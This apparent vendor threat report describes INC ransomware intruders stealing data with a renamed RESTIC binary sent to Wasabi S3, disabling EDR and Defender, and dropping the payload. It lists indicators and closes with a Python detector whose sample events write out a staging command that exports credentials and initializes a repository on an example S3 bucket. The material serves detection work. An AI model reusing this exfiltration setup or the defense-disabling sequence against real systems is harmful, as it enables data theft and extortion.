RESTIC Data Exfiltration Fuels Ransomware
Huntress SOC analysts detected RESTIC data exfiltration tied to INC ransomware campaigns: intruders stage critical files with a disguised copy of the open-source backup utility before deploying the payload. In the February 25, 2026, incident, partial EDR coverage still exposed a share mapped to F:, PsExec used to escalate privileges, and a scheduled task named “Recovery Diagnostics” that launched PowerShell against C:\Users\Public\Documents\new.ps1.
Base64-encoded PowerShell commands configured RESTIC through the AWS_ACCESS_KEY_ID and AWS_SECRET_ACCESS_KEY environment variables, pointed it at repositories on s3.wasabisys.com, and set a repository password of literally ‘password’. A copy of restic.exe renamed to winupdate.exe ran the repository init and then backups driven by file lists in new.txt. Because the agent rollout was incomplete and no SIEM was in place, initial access went unobserved, echoing a February 9 case that was stopped mid-exfiltration.
Stealthy RESTIC Staging Techniques
Attackers exploit RESTIC’s versatility for covert data exfiltration: they set the credential and repository environment variables in PowerShell for a Wasabi S3 target and run the init/backup sequence from hidden paths. The file lists in new.txt suggest prior reconnaissance for high-value assets such as configuration files and databases.
Renaming the binary to winupdate.exe slips past name-based signatures, and the base64-encoded command lines recorded in PowerShell Event ID 600 logs resemble routine RMM activity. A weak repository password like ‘password’ also puts the repository itself at risk of compromise, as Cyber Centaurs noted in their January 22 analysis of overlapping infrastructure.
EDR Bypass and Ransomware Drop
After staging, edr.exe (SHA256: 1d15b57db62c079fc6274f8ea02ce7ec3d6b158834b142f5345db14f16134f0d) was launched alongside VIPRE’s AgentUninstallPassword.exe, producing SecurityCenter log entries for agent disablement. Windows Defender real-time protection was turned off next.
INC ransomware was dropped as win.exe (SHA256: e034a4c00f168134900bfe235ff2f78daf8bfcfa8b594cd2dd563d43f5de1b13) and run with --sup --hide --mode medium; RestartManager events (Event ID 10000) show it forcing access to open files for encryption, followed by INC-README.txt ransom notes.
Repeated TTPs and Key Defenses
Huntress connected the incident to the February 9 case (where HRSword was used against Acronis) and to Cyber Centaurs’ findings through shared AWS keys and repositories. The IOCs confirm campaign overlap.
Deploy EDR fleetwide, forward PowerShell logs to a SIEM and alert on anomalies such as encoded commands, monitor schtasks and RESTIC processes (including renamed copies), and block or alert on unexpected traffic to Wasabi S3. Huntress triage by Amelia Casley and team prevented worse outcomes.
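The staging technique above and the defenses just listed both come down to the same detection logic: decode the base64 that PowerShell records in Event ID 600, look for RESTIC’s credential and repository settings, and flag RESTIC command syntax coming from a binary that is not named restic.exe or from a scheduled task pointing at a script under C:\Users\Public. The following Python is an added example written for this page, not Huntress tooling or RESTIC project code. The event dictionaries are constructed samples, the field names (host_application, new_process_name, command_line, task_action) are assumed to be what a SIEM normalizes from the Windows PowerShell, 4688 and 4698 events, and the credential values are placeholders, not real keys.

```python
import base64
import re

# Indicators from the case described above: restic's S3 credential and
# repository environment variables, the Wasabi endpoint, and restic's own
# command syntax ("-r <repo> init", "backup --files-from <list>").
RESTIC_ENV_VARS = ("AWS_ACCESS_KEY_ID", "AWS_SECRET_ACCESS_KEY", "RESTIC_PASSWORD")
S3_ENDPOINT_HINT = "s3.wasabisys.com"
RESTIC_SYNTAX = re.compile(
    r"(?:-r|--repo)\s+(?:s3|sftp|rest|b2|azure|gs|rclone):|--files-from\b", re.IGNORECASE)
# -e, -ec, -enc and -EncodedCommand are all accepted by powershell.exe.
ENCODED_ARG = re.compile(r"-e(?:c|nc|ncodedcommand)?\s+([A-Za-z0-9+/=]{16,})", re.IGNORECASE)
# Script location that stood out in the incident (C:\Users\Public\Documents\new.ps1).
SUSPICIOUS_SCRIPT_DIR = re.compile(r"\\Users\\Public\\", re.IGNORECASE)
WEAK_PASSWORD = re.compile(r"RESTIC_PASSWORD\s*=\s*['\"]?password['\"]?(?=[\s;]|$)")


def decode_encoded_command(command_line):
    """Return the plaintext of a -EncodedCommand argument, or None.

    PowerShell encodes the script as UTF-16LE before base64, so a plain
    base64 decode would yield NUL-interleaved bytes; decode both layers.
    """
    m = ENCODED_ARG.search(command_line)
    if not m:
        return None
    try:
        return base64.b64decode(m.group(1)).decode("utf-16-le")
    except (ValueError, UnicodeDecodeError):
        return None


def restic_findings(text):
    """Indicators of a restic exfiltration setup in a decoded script or command line."""
    findings = []
    env_hits = [v for v in RESTIC_ENV_VARS if v in text]
    if env_hits:
        findings.append("restic/S3 credentials set via env vars: " + ", ".join(env_hits))
    if S3_ENDPOINT_HINT in text.lower():
        findings.append("repository endpoint is Wasabi S3 (" + S3_ENDPOINT_HINT + ")")
    if WEAK_PASSWORD.search(text):
        findings.append("trivial repository password 'password'")
    return findings


def analyze_event(event):
    """Apply the event-type specific checks and return a list of findings."""
    eid = event["event_id"]
    findings = []
    if eid == 600:  # PowerShell provider lifecycle; HostApplication carries the command line
        decoded = decode_encoded_command(event["host_application"])
        if decoded:
            findings.append("base64 -EncodedCommand decoded")
            findings.extend(restic_findings(decoded))
            if RESTIC_SYNTAX.search(decoded):
                findings.append("restic repository/backup syntax in encoded script")
    elif eid == 4688:  # process creation
        image = event["new_process_name"].rsplit("\\", 1)[-1].lower()
        cmdline = event["command_line"]
        if RESTIC_SYNTAX.search(cmdline):
            if image != "restic.exe":
                findings.append("restic command syntax from renamed binary " + image)
            else:
                findings.append("restic repository syntax from restic.exe")
        findings.extend(restic_findings(cmdline))
    elif eid == 4698:  # scheduled task created
        action = event["task_action"]
        if action.lower().endswith(".ps1") and SUSPICIOUS_SCRIPT_DIR.search(action):
            findings.append("scheduled task '%s' runs PowerShell script from %s"
                            % (event["task_name"], action))
    return findings


def build_encoded(script):
    """Encode a script the way powershell -EncodedCommand expects (UTF-16LE, then base64)."""
    return base64.b64encode(script.encode("utf-16-le")).decode("ascii")


# Constructed sample events; placeholder credentials, not real keys.
STAGING_SCRIPT = (
    "$env:AWS_ACCESS_KEY_ID='EXAMPLEKEYID'; "
    "$env:AWS_SECRET_ACCESS_KEY='EXAMPLESECRET'; "
    "$env:RESTIC_PASSWORD='password'; "
    "C:\\Users\\Public\\Documents\\winupdate.exe -r s3:s3.wasabisys.com/examplebucket init"
)
SAMPLE_EVENTS = [
    {"event_id": 600, "host_application": "powershell.exe -nop -w hidden -enc " + build_encoded(STAGING_SCRIPT)},
    {"event_id": 4688, "new_process_name": "C:\\Users\\Public\\Documents\\winupdate.exe",
     "command_line": "winupdate.exe -r s3:s3.wasabisys.com/examplebucket backup "
                     "--files-from C:\\Users\\Public\\Documents\\new.txt"},
    {"event_id": 4698, "task_name": "Recovery Diagnostics",
     "task_action": "C:\\Users\\Public\\Documents\\new.ps1"},
    {"event_id": 4688, "new_process_name": "C:\\Program Files\\restic\\restic.exe",  # legitimate, on-prem target
     "command_line": "restic.exe -r sftp:backup@nas.corp:/repo backup C:\\Data"},
    {"event_id": 600, "host_application": "powershell.exe -Command Get-Date"},  # benign
]


def triage(events):
    """Return {event index: findings} for every event that raised at least one finding."""
    results = {}
    for i, ev in enumerate(events):
        hits = analyze_event(ev)
        if hits:
            results[i] = hits
    return results


if __name__ == "__main__":
    for idx, hits in triage(SAMPLE_EVENTS).items():
        print(idx, SAMPLE_EVENTS[idx]["event_id"], hits)
```

The renamed-binary check deliberately keys on RESTIC’s argument syntax rather than the image name, since that is exactly what winupdate.exe preserved; the legitimate restic.exe run against an sftp target is reported only as informational, so the same rule still satisfies the “monitor RESTIC processes” recommendation without losing the signal on renamed copies.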